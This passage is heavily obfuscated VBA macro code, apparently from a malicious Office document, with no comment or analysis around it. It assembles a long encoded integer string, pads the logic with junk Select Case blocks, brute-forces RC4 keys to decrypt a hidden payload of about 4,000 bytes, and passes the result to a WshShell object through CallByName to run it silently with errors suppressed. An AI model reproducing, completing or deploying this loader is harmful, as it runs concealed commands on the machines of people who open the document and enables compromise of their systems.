OwF = 6
Select Case OwF
Case 63
OwF = OwF + 1
Case 88
OwF = OwF + OwF
Case Else
OwF = OwF - 1
End Select
JeGYP8r = JeGYP8r & "5U-9260U25530U11967U16535U-22513U12469U25192U21710U23417U-988U27180U31840U28721U-22624U-12244U-18736U-25674U23969U28565U-14479U-23131U-5908U-30187U18457U29507U6363U-980U30156U-2298U-8945U-4771U19263U8900U-20505U11525U8925U8832U24104U9010U18763U-22250U27560U13643U26790U17398U23599U-3156U4978U15357U20879U24316U18580U-1699U32652U-7864U14148U13384U29203U-8241U-21575U-13341U-24238U16459U14590U31889U11860U29756U16849U9285U-351U-3719U-13665U31197U22790U-19243U24843U16226U-24380U-24771U18089U3477U30238U-12762U9352U-12826U15592U17546U-26549U-18480U5629U26078U-15051U-20252U19144U-28817U-29496U1883U7396U-13566U-11551U14777U20133U11215U10148U-9939U32451U4946U-14426U-21808U24867U19150U-16434U30977U5046U29321U28897U-15192U8823U13677U-2835U18780U-21555U22756U-9445U-22502U30426U-18024U-1050U-8050U22940U"
SpHNR = 82
Select Case SpHNR
Case 78
SpHNR = SpHNR + 1
Case 44
SpHNR = SpHNR + SpHNR
Case Else
SpHNR = SpHNR - 1
End Select
JeGYP8r = JeGYP8r & "6242U14689U-7554U-10835U-16773U-17965U6285U25601U18533U16361U11604U-2175U4566U29200U18772U4895U17978U-21149U-16177U30511U-27445U-24949U-19634U30035U18755U-11292U3934U-20700U9958U-132U-23340U26636U-4353U-9011U30077U-16623U-10070U27043U20593U-26256U15721U-26135U-23070U-8586U4409U-25696U6750U-24735U-27608U-2980U-14052U26295U-30036U-22527U-11552U3588U-29219U-27885U10047U31418U13079U-26000U3066U7781U31147U-30021U-27625U-4253U26592U-14857U13348U-4731U-1675U14310U-25187U10971U31483U18053U24692U24541U14944U-24587U14244U25108U8699U-32103U6808U15521U17639U-27570U24330U4726U4511U2250U2041U23804U-30946U17018U11674U-15903U-2098U27221U16120U8713U20135U17332U20710U18720U-8187U374U-19154U22065U-19647U-31516U-7102U-20785U10277U3876U-16021U-2533U2391U-26928U-28090U23599U-12239U-17149U28350U16736U31452U690"
FRR = 36
Select Case FRR
Case 56
FRR = FRR + 1
Case 23
FRR = FRR + FRR
Case Else
FRR = FRR - 1
End Select
JeGYP8r = JeGYP8r & "7U13217U-24439U-14803U30412U-7882U14827U-24382U10722U15675U27738U10398U4174U-7985U-14569U22930U17369U-5268U10222U1802U2580U-16835U27570U-14893U-2718U27649U26090U22811U13086U-29008U31630U9368U-28742U-14638U10185U32268U-27567U8012U-12839U-5929U32749U-26786U-21115U25933U-13323U22132U-1399U-13880U1422U-26924U6600U11813U9871U29300U-4881U-10912U4374U29981U30726U12219U5689U-4460U-12683U294U20017U26689U3841U20290U17863U28354U-17990U-17832U13199U-26436U-11120U-1812U32612U-8321U2782U18525U14640U-3415U-11707U-18255U22740U30461U-11072U-2867U-22405U-37U10906U-8966U28012U-14731U-13356U13382U32237U-29780U-7968U-19819U-1290U32669U2034U21586U-5358U-10962U25095U-29900U-25134U4904U8724U264U-12108U-1194U12000U-28686U18933U24591U25501U2815U-14816U-3048U-2594U-31671U28302U-16690U-286U30288U-2748U25372U-23071U"
Ks1Z = 98
Select Case Ks1Z
Case 96
Ks1Z = Ks1Z + 1
Case 50
Ks1Z = Ks1Z + Ks1Z
Case Else
Ks1Z = Ks1Z - 1
End Select
JeGYP8r = JeGYP8r & "1492U30969U-6852U11603U29804U-1529U6377U-11574U28371U-10109U853U-3467U3370U-28939U-9551U-15259U-32596U-27687U10834U13170U27402U21328U5432U-18693U-28740U27008U-3767U22572U-17554U-25160U-3178U-21160U-19246U24312U-9268U29802U-3327U10834U-8793U16027U4976U-30318U5654U26842U3459U4636U-17192U-29039U-11587U-29450U11316U-19217U8741U22804U30716U17450U-13687U22909U26960U-31243U18212U-8599U26108U-7426U-29199U9644U14243U17733U13504U20334U-3219U-16597U14405U19862U21849U-28277U1729U14972U9366U13146U-15418U32514U23600U29041U4367U-2168U-25919U-19877U23374U-1887U25779U29847U3033U21509U22306U-16015U-23396U-25296U-15113U13550U7261U-90U25435U-28545U22627U12333U23396U29121U4677U-17345U449U-4418U-32748U20568U15032U-3036U-30292U-22957U20027U-21075U-7065U-4038U-25755U-21929U-17958U-22165U22345U8588U27371U-26444U"
NuQEBwj = 49
Select Case NuQEBwj
Case 84
NuQEBwj = NuQEBwj + 1
Case 52
NuQEBwj = NuQEBwj + NuQEBwj
Case Else
NuQEBwj = NuQEBwj - 1
End Select
JeGYP8r = JeGYP8r & "-29201U-22262U-30654U15789U14608U4731U-27212U-10877U32637U-8143U-26210U13209U-18197U-27232U6801U-11832U-5265U30294U-4538U-2975U9771U-23903U26463U-13693U-3913U10136U28419U15642U17688U30411U19386U7759U-1815U-16060U-6633U-30614U-10558U23622U26180U16653U10906U-13382U22314U6609U30788U4859U-23972U4296U-7212U21209U6025U7503U4308U30288U17936U1556U25650U-5407U6927U18900U-10410U-5117U-10638U-4294U-30503U10680U-27806U-11112U4385U-32244U1885U11362U9054U-4941U9299U-28465U12061U-21736U30662U-7069U18590U10538U-25559U15465U-24759U-32472U-25737U-25281U5281U23601U30581U-11959U-5249U-30513U-25560U-12202U-2041U28523U-23432U24457U-6105U32382U16039U-8613U5544U1859U7395U23303U8499U-10044U-2878U30483U-2929U-723U4893U-16393U-29790U14373U-2440U2595U-23446U-21684U-11119U-15612U-70U30278U27197U-22000U-10306U-14006U"
XvO3y1 = 97
Select Case XvO3y1
Case 10
XvO3y1 = XvO3y1 + 1
Case 47
XvO3y1 = XvO3y1 + XvO3y1
Case Else
XvO3y1 = XvO3y1 - 1
End Select
JeGYP8r = JeGYP8r & "-6340U3193U-16451U-16817U31919U32592U-19818U-3164U549U-13049U-621U30151U17699U26222U-16097U18657U1790U-29859U-9649U-11340U7228U-20944U-10272U-5325U-3590U26896U-16796U6214U-31464U1386U31459U-12068U-20446U-2244U-27302U-22953U-17288U12183U-19941U-25590U14041U-19820U17097U-7456U952U-25310U2510U20032U31835U6333U-32725U22324U-32470U27742U-9363U-19079U-13307U2484U17081U12076U18837U26936U-24356U23760U-5038U-20821U21707U-4695U10839U1816U27804U28269U-6190U-4421U-23815U26073U-8800U27059U-29959U-6765U5416U24775U1778U6728U12194U-9027U-7232U3803U30150U-22419U-22892U30241U29512U-9367U12226U7098U1920U-28619U6206U32231U-5180U-31010U-10786U14109U3387U-9872U-2121U5405U30612U-30661U5349U22823U-14233U-10970U-15933U-13825U-21955U-25605U31968U1468U-31119U-9855U8696U-15007U11343U9714U6072U31346U8969U18037U-141U"
PswT = 21
Select Case PswT
Case 1
PswT = PswT + 1
Case 61
PswT = PswT + PswT
Case Else
PswT = PswT - 1
End Select
JeGYP8r = JeGYP8r & "8881U-392U9774U-6892U-3354U-28806U12487U-29862U-27084U-3125U-29386U28720U22585U27249U-13810U28496U-15842U-3872U-13388U-26261U16807U3275U-32738U22711U-12140U-3153U26745U7383U24810U25891U24688U-18201U11367U6226U32360U16807U-31302U-18369U779U26676U-31403U23717U17496U-13222U-11514U-630U28897U-4732U-20853U18774U1199U9740U30063U-8753U-27636U4436U2154U5425U-17747U29900U31236U-11241U-943U-20652U10767U-20363U27925U23725U13460U27316U-12129U30874U-25572U-24446U-16038U26777U31777U-30912U17190U6917U32318U13996U11850U6163U-3948U-10344U-27976U-30108U22332U12579U-3033U-27660U-12576U-7328U968U9821U-22811U-1975U-20386U-27240U-21659U-31900U7128U-11116U-22113U-819U3836U-29255U7224U-24570U9329U-25018U30738U-13745U5769U-24654U16025U-27445U30441U-8665U13024U30813U-26913U1418U20494U-8288U26859U3787U8682U68U1604"
AL = 11
Select Case AL
Case 12
AL = AL + 1
Case 9
AL = AL + AL
Case Else
AL = AL - 1
End Select
JeGYP8r = JeGYP8r & "U8242U-16946"
M0lRAi = 66
Select Case M0lRAi
Case 76
M0lRAi = M0lRAi + 1
Case 47
M0lRAi = M0lRAi + M0lRAi
Case Else
M0lRAi = M0lRAi - 1
End Select
Dim YMtY() As String, YwDxL As Integer
DlMlA = 79
Select Case DlMlA
Case 38
DlMlA = DlMlA + 1
Case 89
DlMlA = DlMlA + DlMlA
Case Else
DlMlA = DlMlA - 1
End Select
YMtY = Split(JeGYP8r, EHh((2306 - 2221)))
Xbptc4 = 36
Select Case Xbptc4
Case 6
Xbptc4 = Xbptc4 + 1
Case 71
Xbptc4 = Xbptc4 + Xbptc4
Case Else
Xbptc4 = Xbptc4 - 1
End Select
ReDim NtS7(2077)
BZsE3 = 72
Select Case BZsE3
Case 25
BZsE3 = BZsE3 + 1
Case 41
BZsE3 = BZsE3 + BZsE3
Case Else
BZsE3 = BZsE3 - 1
End Select
For YwDxL = 0 To 2077
NtS7(YwDxL) = YMtY(YwDxL)
Next YwDxL
Dim UlH5 As String, OxLWP As Long, RHD As String, S7RIT As String, JUayVh As String, XeshDTH As String, Ut As String, EWWd5ru As String, Vtkifq6() As Byte
XBMBay = 43
Select Case XBMBay
Case 86
XBMBay = XBMBay + 1
Case 55
XBMBay = XBMBay + XBMBay
Case Else
XBMBay = XBMBay - 1
End Select
C7FEHZ = 90
Select Case C7FEHZ
Case 29
C7FEHZ = C7FEHZ + 1
Case 66
C7FEHZ = C7FEHZ + C7FEHZ
Case Else
C7FEHZ = C7FEHZ - 1
End Select
Dim SoV(14) As Byte, GikRbK(31) As Byte
Ut0L = 28
Select Case Ut0L
Case 45
Ut0L = Ut0L + 1
Case 46
Ut0L = Ut0L + Ut0L
Case Else
Ut0L = Ut0L - 1
End Select
SoV(0) = 111
SoV(1) = 25
SoV(2) = 255
SoV(3) = 62
SoV(4) = 173
SoV(5) = 147
SoV(6) = 163
SoV(7) = 244
SoV(8) = 220
SoV(9) = 42
SoV(10) = 75
SoV(11) = 223
SoV(12) = 169
SoV(13) = 94
SoV(14) = 190
Om = 94
Select Case Om
Case 9
Om = Om + 1
Case 40
Om = Om + Om
Case Else
Om = Om - 1
End Select
GikRbK(0) = 65
GikRbK(1) = 121
GikRbK(2) = 53
GikRbK(3) = 69
GikRbK(4) = 76
GikRbK(5) = 85
GikRbK(6) = 76
GikRbK(7) = 71
GikRbK(8) = 83
GikRbK(9) = 79
GikRbK(10) = 79
GikRbK(11) = 119
Bzmf9Tf = 27
Select Case Bzmf9Tf
Case 34
Bzmf9Tf = Bzmf9Tf + 1
Case 39
Bzmf9Tf = Bzmf9Tf + Bzmf9Tf
Case Else
Bzmf9Tf = Bzmf9Tf - 1
End Select
For OxLWP = Q7nz(TlL) To Q7nz(VryMC)
GikRbK(12) = VzdG(OxLWP, 1)
GikRbK(13) = VzdG(OxLWP, 2)
GikRbK(14) = VzdG(OxLWP, 3)
GikRbK(15) = VzdG(OxLWP, 4)
GikRbK(16) = GikRbK(12)
GikRbK(17) = GikRbK(13)
GikRbK(18) = GikRbK(14)
GikRbK(19) = GikRbK(15)
GikRbK(20) = GikRbK(12)
GikRbK(21) = GikRbK(13)
GikRbK(22) = GikRbK(14)
GikRbK(23) = GikRbK(15)
GikRbK(24) = GikRbK(12)
GikRbK(25) = GikRbK(13)
GikRbK(26) = GikRbK(14)
GikRbK(27) = GikRbK(15)
GikRbK(28) = GikRbK(12)
GikRbK(29) = GikRbK(13)
GikRbK(30) = GikRbK(14)
GikRbK(31) = GikRbK(15)
If EkBP9t8(SoV, GikRbK) = "Fo6coH8LMKKysGi" Then Exit For
Next OxLWP
MYzQ = 70
Select Case MYzQ
Case 68
MYzQ = MYzQ + 1
Case 22
MYzQ = MYzQ + MYzQ
Case Else
MYzQ = MYzQ - 1
End Select
Dim R3nf(12) As Byte, K8odzA(39) As Byte
PNUj1zl = 54
Select Case PNUj1zl
Case 42
PNUj1zl = PNUj1zl + 1
Case 77
PNUj1zl = PNUj1zl + PNUj1zl
Case Else
PNUj1zl = PNUj1zl - 1
End Select
R3nf(0) = 141
R3nf(1) = 156
R3nf(2) = 168
R3nf(3) = 56
R3nf(4) = 116
R3nf(5) = 53
R3nf(6) = 219
R3nf(7) = 249
R3nf(8) = 149
R3nf(9) = 244
R3nf(10) = 80
R3nf(11) = 231
R3nf(12) = 40
MOMaUC = 43
Select Case MOMaUC
Case 63
MOMaUC = MOMaUC + 1
Case 74
MOMaUC = MOMaUC + MOMaUC
Case Else
MOMaUC = MOMaUC - 1
End Select
K8odzA(0) = 76
K8odzA(1) = 66
K8odzA(2) = 83
K8odzA(3) = 71
K8odzA(4) = 84
K8odzA(5) = 100
K8odzA(6) = 107
K8odzA(7) = 79
K8odzA(8) = 80
K8odzA(9) = 110
K8odzA(10) = 56
K8odzA(11) = 77
K8odzA(12) = 113
K8odzA(13) = 49
K8odzA(14) = 77
K8odzA(15) = 99
K8odzA(16) = 51
K8odzA(17) = 66
K8odzA(18) = 65
K8odzA(19) = 54
YLYINrD = 27
Select Case YLYINrD
Case 83
YLYINrD = YLYINrD + 1
Case 14
YLYINrD = YLYINrD + YLYINrD
Case Else
YLYINrD = YLYINrD - 1
End Select
For OxLWP = Q7nz(TlL) To Q7nz(VryMC)
K8odzA(20) = VzdG(OxLWP, 1)
K8odzA(21) = VzdG(OxLWP, 2)
K8odzA(22) = VzdG(OxLWP, 3)
K8odzA(23) = VzdG(OxLWP, 4)
K8odzA(24) = K8odzA(20)
K8odzA(25) = K8odzA(21)
K8odzA(26) = K8odzA(22)
K8odzA(27) = K8odzA(23)
K8odzA(28) = K8odzA(20)
K8odzA(29) = K8odzA(21)
K8odzA(30) = K8odzA(22)
K8odzA(31) = K8odzA(23)
K8odzA(32) = K8odzA(20)
K8odzA(33) = K8odzA(21)
K8odzA(34) = K8odzA(22)
K8odzA(35) = K8odzA(23)
K8odzA(36) = K8odzA(20)
K8odzA(37) = K8odzA(21)
K8odzA(38) = K8odzA(22)
K8odzA(39) = K8odzA(23)
If EkBP9t8(R3nf, K8odzA) = "BYvN0Vo8IwGiJ" Then Exit For
Next OxLWP
C1LmEqX = 9
Select Case C1LmEqX
Case 24
C1LmEqX = C1LmEqX + 1
Case 4
C1LmEqX = C1LmEqX + C1LmEqX
Case Else
C1LmEqX = C1LmEqX - 1
End Select
Dim TjU9X(11) As Byte, G0KQKk(35) As Byte
OAwcjR = 32
Select Case OAwcjR
Case 46
OAwcjR = OAwcjR + 1
Case 77
OAwcjR = OAwcjR + OAwcjR
Case Else
OAwcjR = OAwcjR - 1
End Select
TjU9X(0) = 84
TjU9X(1) = 105
TjU9X(2) = 48
TjU9X(3) = 43
TjU9X(4) = 190
TjU9X(5) = 221
TjU9X(6) = 10
TjU9X(7) = 15
TjU9X(8) = 47
TjU9X(9) = 55
TjU9X(10) = 87
TjU9X(11) = 98
EcbB = 92
Select Case EcbB
Case 84
EcbB = EcbB + 1
Case 62
EcbB = EcbB + EcbB
Case Else
EcbB = EcbB - 1
End Select
G0KQKk(0) = 80
G0KQKk(1) = 104
G0KQKk(2) = 51
G0KQKk(3) = 122
G0KQKk(4) = 78
G0KQKk(5) = 55
G0KQKk(6) = 68
G0KQKk(7) = 57
G0KQKk(8) = 100
G0KQKk(9) = 81
G0KQKk(10) = 111
G0KQKk(11) = 84
G0KQKk(12) = 102
G0KQKk(13) = 81
G0KQKk(14) = 82
G0KQKk(15) = 87
Yhdopm = 37
Select Case Yhdopm
Case 63
Yhdopm = Yhdopm + 1
Case 39
Yhdopm = Yhdopm + Yhdopm
Case Else
Yhdopm = Yhdopm - 1
End Select
For OxLWP = Q7nz(TlL) To Q7nz(VryMC)
G0KQKk(16) = VzdG(OxLWP, 1)
G0KQKk(17) = VzdG(OxLWP, 2)
G0KQKk(18) = VzdG(OxLWP, 3)
G0KQKk(19) = VzdG(OxLWP, 4)
G0KQKk(20) = G0KQKk(16)
G0KQKk(21) = G0KQKk(17)
G0KQKk(22) = G0KQKk(18)
G0KQKk(23) = G0KQKk(19)
G0KQKk(24) = G0KQKk(16)
G0KQKk(25) = G0KQKk(17)
G0KQKk(26) = G0KQKk(18)
G0KQKk(27) = G0KQKk(19)
G0KQKk(28) = G0KQKk(16)
G0KQKk(29) = G0KQKk(17)
G0KQKk(30) = G0KQKk(18)
G0KQKk(31) = G0KQKk(19)
G0KQKk(32) = G0KQKk(16)
G0KQKk(33) = G0KQKk(17)
G0KQKk(34) = G0KQKk(18)
G0KQKk(35) = G0KQKk(19)
If EkBP9t8(TjU9X, G0KQKk) = "N1LVOcPUbPWj" Then Exit For
Next OxLWP
Gy = 13
Select Case Gy
Case 37
Gy = Gy + 1
Case 90
Gy = Gy + Gy
Case Else
Gy = Gy - 1
End Select
Dim CSt0(16) As Byte, Qr5L(30) As Byte
DYkf = 29
Select Case DYkf
Case 81
DYkf = DYkf + 1
Case 97
DYkf = DYkf + DYkf
Case Else
DYkf = DYkf - 1
End Select
CSt0(0) = 98
CSt0(1) = 48
CSt0(2) = 109
CSt0(3) = 74
CSt0(4) = 227
CSt0(5) = 59
CSt0(6) = 88
CSt0(7) = 127
CSt0(8) = 161
CSt0(9) = 87
CSt0(10) = 202
CSt0(11) = 69
CSt0(12) = 141
CSt0(13) = 8
CSt0(14) = 36
CSt0(15) = 66
CSt0(16) = 139
W5DFr7R = 32
Select Case W5DFr7R
Case 44
W5DFr7R = W5DFr7R + 1
Case 36
W5DFr7R = W5DFr7R + W5DFr7R
Case Else
W5DFr7R = W5DFr7R - 1
End Select
Qr5L(0) = 82
Qr5L(1) = 78
Qr5L(2) = 52
Qr5L(3) = 80
Qr5L(4) = 104
Qr5L(5) = 78
Qr5L(6) = 54
Qr5L(7) = 54
Qr5L(8) = 72
Qr5L(9) = 79
Qr5L(10) = 97
S8J75f = 96
Select Case S8J75f
Case 12
S8J75f = S8J75f + 1
Case 91
S8J75f = S8J75f + S8J75f
Case Else
S8J75f = S8J75f - 1
End Select
For OxLWP = Q7nz(TlL) To Q7nz(VryMC)
Qr5L(11) = VzdG(OxLWP, 1)
Qr5L(12) = VzdG(OxLWP, 2)
Qr5L(13) = VzdG(OxLWP, 3)
Qr5L(14) = VzdG(OxLWP, 4)
Qr5L(15) = Qr5L(11)
Qr5L(16) = Qr5L(12)
Qr5L(17) = Qr5L(13)
Qr5L(18) = Qr5L(14)
Qr5L(19) = Qr5L(11)
Qr5L(20) = Qr5L(12)
Qr5L(21) = Qr5L(13)
Qr5L(22) = Qr5L(14)
Qr5L(23) = Qr5L(11)
Qr5L(24) = Qr5L(12)
Qr5L(25) = Qr5L(13)
Qr5L(26) = Qr5L(14)
Qr5L(27) = Qr5L(11)
Qr5L(28) = Qr5L(12)
Qr5L(29) = Qr5L(13)
Qr5L(30) = Qr5L(14)
If EkBP9t8(CSt0, Qr5L) = "RjzeVsQzx5pXkkMSH" Then Exit For
Next OxLWP
BZ70Q = 82
Select Case BZ70Q
Case 53
BZ70Q = BZ70Q + 1
Case 66
BZ70Q = BZ70Q + BZ70Q
Case Else
BZ70Q = BZ70Q - 1
End Select
Jcj = 96
Select Case Jcj
Case 48
Jcj = Jcj + 1
Case 21
Jcj = Jcj + Jcj
Case Else
Jcj = Jcj - 1
End Select
Dim QTOvA As Long, TR0 As Long, FEX As Long, IKA1Z As Long, Io(4160) As Byte, Eu6pB9 As Long, FIXTA As String
JoS = 79
Select Case JoS
Case 28
JoS = JoS + 1
Case 57
JoS = JoS + JoS
Case Else
JoS = JoS - 1
End Select
For QTOvA = 0 To Q7nz(NtS7)
Ry = 56
Select Case Ry
Case 82
Ry = Ry + 1
Case 31
Ry = Ry + Ry
Case Else
Ry = Ry - 1
End Select
For TR0 = 1 To 2
T1J = 55
Select Case T1J
Case 98
T1J = T1J + 1
Case 67
T1J = T1J + T1J
Case Else
T1J = T1J - 1
End Select
If FEX = 1 Then
DwQ81tc = 31
Select Case DwQ81tc
Case 72
DwQ81tc = DwQ81tc + 1
Case 20
DwQ81tc = DwQ81tc + DwQ81tc
Case Else
DwQ81tc = DwQ81tc - 1
End Select
Io(IKA1Z) = Eq5r(NtS7(Eu6pB9))(FEX)
NYYdV = 61
Select Case NYYdV
Case 18
NYYdV = NYYdV + 1
Case 22
NYYdV = NYYdV + NYYdV
Case Else
NYYdV = NYYdV - 1
End Select
Else
Tp = 10
Select Case Tp
Case 20
Tp = Tp + 1
Case 90
Tp = Tp + Tp
Case Else
Tp = Tp - 1
End Select
FEX = 0
Pw1v0 = 62
Select Case Pw1v0
Case 76
Pw1v0 = Pw1v0 + 1
Case 34
Pw1v0 = Pw1v0 + Pw1v0
Case Else
Pw1v0 = Pw1v0 - 1
End Select
Io(IKA1Z) = Eq5r(NtS7(Eu6pB9))(FEX)
PPXL3VZ = 28
Select Case PPXL3VZ
Case 33
PPXL3VZ = PPXL3VZ + 1
Case 17
PPXL3VZ = PPXL3VZ + PPXL3VZ
Case Else
PPXL3VZ = PPXL3VZ - 1
End Select
End If
EQfyuh = 64
Select Case EQfyuh
Case 34
EQfyuh = EQfyuh + 1
Case 4
EQfyuh = EQfyuh + EQfyuh
Case Else
EQfyuh = EQfyuh - 1
End Select
IKA1Z = IKA1Z + 1
YP93K = 45
Select Case YP93K
Case 91
YP93K = YP93K + 1
Case 26
YP93K = YP93K + YP93K
Case Else
YP93K = YP93K - 1
End Select
FEX = FEX + 1
EiA = 24
Select Case EiA
Case 68
EiA = EiA + 1
Case 10
EiA = EiA + EiA
Case Else
EiA = EiA - 1
End Select
Next TR0
KQJ = 14
Select Case KQJ
Case 59
KQJ = KQJ + 1
Case 49
KQJ = KQJ + KQJ
Case Else
KQJ = KQJ - 1
End Select
Eu6pB9 = Eu6pB9 + 1
OIp = 8
Select Case OIp
Case 78
OIp = OIp + 1
Case 91
OIp = OIp + OIp
Case Else
OIp = OIp - 1
End Select
Next QTOvA
Km90 = 73
Select Case Km90
Case 45
Km90 = Km90 + 1
Case 76
Km90 = Km90 + Km90
Case Else
Km90 = Km90 - 1
End Select
Dim AQGS(138) As Byte, D0CHn As Long, Gyo As Long
OQmBD = 67
Select Case OQmBD
Case 37
OQmBD = OQmBD + 1
Case 2
OQmBD = OQmBD + OQmBD
Case Else
OQmBD = OQmBD - 1
End Select
D0CHn = 0
ACYw9 = 21
Select Case ACYw9
Case 15
ACYw9 = ACYw9 + 1
Case 81
ACYw9 = ACYw9 + ACYw9
Case Else
ACYw9 = ACYw9 - 1
End Select
Gyo = 0
YXWLSd = 81
Select Case YXWLSd
Case 35
YXWLSd = YXWLSd + 1
Case 73
YXWLSd = YXWLSd + YXWLSd
Case Else
YXWLSd = YXWLSd - 1
End Select
For OxLWP = 0 To Q7nz(GikRbK)
AQGS(OxLWP) = GikRbK(OxLWP)
D0CHn = D0CHn + 1
Next OxLWP
PSYBCLX = 18
Select Case PSYBCLX
Case 12
PSYBCLX = PSYBCLX + 1
Case 55
PSYBCLX = PSYBCLX + PSYBCLX
Case Else
PSYBCLX = PSYBCLX - 1
End Select
For OxLWP = Q7nz(GikRbK) + 1 To Q7nz(K8odzA) + D0CHn
AQGS(OxLWP) = K8odzA(Gyo)
Gyo = Gyo + 1
D0CHn = D0CHn + 1
Next OxLWP
II6Ngs = 19
Select Case II6Ngs
Case 86
II6Ngs = II6Ngs + 1
Case 43
II6Ngs = II6Ngs + II6Ngs
Case Else
II6Ngs = II6Ngs - 1
End Select
Gyo = 0
OsALpq2 = 46
Select Case OsALpq2
Case 37
OsALpq2 = OsALpq2 + 1
Case 38
OsALpq2 = OsALpq2 + OsALpq2
Case Else
OsALpq2 = OsALpq2 - 1
End Select
For OxLWP = D0CHn To Q7nz(G0KQKk) + D0CHn
AQGS(OxLWP) = G0KQKk(Gyo)
Gyo = Gyo + 1
D0CHn = D0CHn + 1
Next OxLWP
DoH0 = 10
Select Case DoH0
Case 58
DoH0 = DoH0 + 1
Case 14
DoH0 = DoH0 + DoH0
Case Else
DoH0 = DoH0 - 1
End Select
Gyo = 0
UXf = 38
Select Case UXf
Case 47
UXf = UXf + 1
Case 73
UXf = UXf + UXf
Case Else
UXf = UXf - 1
End Select
For OxLWP = D0CHn To Q7nz(Qr5L) + D0CHn
AQGS(OxLWP) = Qr5L(Gyo)
Gyo = Gyo + 1
D0CHn = D0CHn + 1
Next OxLWP
IycY = 93
Select Case IycY
Case 46
IycY = IycY + 1
Case 62
IycY = IycY + IycY
Case Else
IycY = IycY - 1
End Select
Vtkifq6 = Io
JuHSy = 26
Select Case JuHSy
Case 77
JuHSy = JuHSy + 1
Case 94
JuHSy = JuHSy + JuHSy
Case Else
JuHSy = JuHSy - 1
End Select
ReDim Preserve Vtkifq6(4155)
McA = 36
Select Case McA
Case 31
McA = McA + 1
Case 20
McA = McA + McA
Case Else
McA = McA - 1
End Select
FIXTA = EkBP9t8(Vtkifq6, AQGS)
RlzmPDg = 74
Select Case RlzmPDg
Case 31
RlzmPDg = RlzmPDg + 1
Case 34
RlzmPDg = RlzmPDg + RlzmPDg
Case Else
RlzmPDg = RlzmPDg - 1
End Select
JyM = 4
Select Case JyM
Case 17
JyM = JyM + 1
Case 30
JyM = JyM + JyM
Case Else
JyM = JyM - 1
End Select
AUI = 60
Select Case AUI
Case 84
AUI = AUI + 1
Case 12
AUI = AUI + AUI
Case Else
AUI = AUI - 1
End Select
Dim PgHhFpJ As New WshShell
FJ = 61
Select Case FJ
Case 94
FJ = FJ + 1
Case 67
FJ = FJ + FJ
Case Else
FJ = FJ - 1
End Select
Dim GKK(2) As Byte, KKXxT(10) As Byte
KgOY4hl = 20
Select Case KgOY4hl
Case 64
KgOY4hl = KgOY4hl + 1
Case 33
KgOY4hl = KgOY4hl + KgOY4hl
Case Else
KgOY4hl = KgOY4hl - 1
End Select
GKK(0) = 82
GKK(1) = 165
GKK(2) = 46
FEjT = 68
Select Case FEjT
Case 84
FEjT = FEjT + 1
Case 64
FEjT = FEjT + FEjT
Case Else
FEjT = FEjT - 1
End Select
KKXxT(0) = 80
KKXxT(1) = 79
KKXxT(2) = 84
KKXxT(3) = 112
KKXxT(4) = 101
KKXxT(5) = 71
KKXxT(6) = 75
KKXxT(7) = 54
KKXxT(8) = 90
KKXxT(9) = 73
KKXxT(10) = 80
CallByName PgHhFpJ, EkBP9t8(GKK, KKXxT), 2439 - 2438, FIXTA, 2398 - 2398, 1050 - 1050
ONjUTkS = 63
Select Case ONjUTkS
Case 87
ONjUTkS = ONjUTkS + 1
Case 86
ONjUTkS = ONjUTkS + ONjUTkS
Case Else
ONjUTkS = ONjUTkS - 1
End Select
End Sub
Private Function EkBP9t8(FGF2pe() As Byte, IwHeX() As Byte) As String
DOr7Jv = 47
Select Case DOr7Jv
Case 86
DOr7Jv = DOr7Jv + 1
Case 42
DOr7Jv = DOr7Jv + DOr7Jv
Case Else
DOr7Jv = DOr7Jv - 1
End Select
On Error Resume Next
N0 = 44
Select Case N0
Case 82
N0 = N0 + 1
Case 42
N0 = N0 + N0
Case Else
N0 = N0 - 1
End Select
Dim JO3Nec0(0 To 255) As Integer, Ge1nxRk As Long, FAOOaq As Long, V5j As Long, N0WlM As Byte, BYw() As Byte, MN() As Byte
YgSkZfd = 31
Select Case YgSkZfd
Case 8
YgSkZfd = YgSkZfd + 1
Case 4
YgSkZfd = YgSkZfd + YgSkZfd
Case Else
YgSkZfd = YgSkZfd - 1
End Select
ReDim BYw(Q7nz(FGF2pe)) As Byte
Wph = 46
Select Case Wph
Case 87
Wph = Wph + 1
Case 64
Wph = Wph + Wph
Case Else
Wph = Wph - 1
End Select
BYw = FGF2pe
W7 = 3
Select Case W7
Case 59
W7 = W7 + 1
Case 62
W7 = W7 + W7
Case Else
W7 = W7 - 1
End Select
ReDim MN(Q7nz(IwHeX)) As Byte
LWDPRHr = 23
Select Case LWDPRHr
Case 85
LWDPRHr = LWDPRHr + 1
Case 97
LWDPRHr = LWDPRHr + LWDPRHr
Case Else
LWDPRHr = LWDPRHr - 1
End Select
MN = IwHeX
GcB3zy = 78
Select Case GcB3zy
Case 91
GcB3zy = GcB3zy + 1
Case 50
GcB3zy = GcB3zy + GcB3zy
Case Else
GcB3zy = GcB3zy - 1
End Select
For Ge1nxRk = 0 To (2267715 / 8893)
JO3Nec0(Ge1nxRk) = Ge1nxRk
Next Ge1nxRk
AGbko = 82
Select Case AGbko
Case 91
AGbko = AGbko + 1
Case 18
AGbko = AGbko + AGbko
Case Else
AGbko = AGbko - 1
End Select
Ge1nxRk = 0
U5t5q1m = 31
Select Case U5t5q1m
Case 84
U5t5q1m = U5t5q1m + 1
Case 23
U5t5q1m = U5t5q1m + U5t5q1m
Case Else
U5t5q1m = U5t5q1m - 1
End Select
FAOOaq = 0
QIPu = 90
Select Case QIPu
Case 79
QIPu = QIPu + 1
Case 14
QIPu = QIPu + QIPu
Case Else
QIPu = QIPu - 1
End Select
V5j = 0
IE2 = 81
Select Case IE2
Case 20
IE2 = IE2 + 1
Case 30
IE2 = IE2 + IE2
Case Else
IE2 = IE2 - 1
End Select
For Ge1nxRk = 0 To (3995 - 3740)
FAOOaq = KEfIE((FAOOaq + JO3Nec0(Ge1nxRk) + MN(KEfIE(Ge1nxRk, (Q7nz(IwHeX) + 1)))), ((9163 - 8907)))
N0WlM = JO3Nec0(Ge1nxRk)
JO3Nec0(Ge1nxRk) = JO3Nec0(FAOOaq)
JO3Nec0(FAOOaq) = N0WlM
Next Ge1nxRk
Naq = 86
Select Case Naq
Case 95
Naq = Naq + 1
Case 67
Naq = Naq + Naq
Case Else
Naq = Naq - 1
End Select
Ge1nxRk = 0
SwK3Dw = 27
Select Case SwK3Dw
Case 98
SwK3Dw = SwK3Dw + 1
Case 85
SwK3Dw = SwK3Dw + SwK3Dw
Case Else
SwK3Dw = SwK3Dw - 1
End Select
FAOOaq = 0
O432 = 4
Select Case O432
Case 9
O432 = O432 + 1
Case 92
O432 = O432 + O432
Case Else
O432 = O432 - 1
End Select
V5j = 0
XtYLvn1 = 3
